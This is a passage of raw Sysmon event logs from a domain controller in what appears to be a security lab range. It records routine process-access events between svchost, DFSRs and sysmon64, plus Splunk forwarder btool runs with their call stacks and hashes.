ystem32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4298-6000-3300-000000009A01}28123320C:\Windows\system32\DFSRs.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-4D00-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429A-6000-4D00-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-429A-6000-4C00-000000009A01}26443224C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-429A-6000-4D00-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.285{08A6967A-429A-6000-4D00-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429A-6000-4C00-000000009A01}2644C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-4C00-000000009A01}2644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429A-6000-4C00-000000009A01}2644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-429A-6000-4B00-000000009A01}29203136C:\Windows\system32\cmd.exe{08A6967A-429A-6000-4C00-000000009A01}2644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.278{08A6967A-429A-6000-4C00-000000009A01}2644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-429A-6000-4B00-000000009A01}2920C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.275{08A6967A-4298-6000-3300-000000009A01}28123160C:\Windows\system32\DFSRs.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c2ea|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-4B00-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4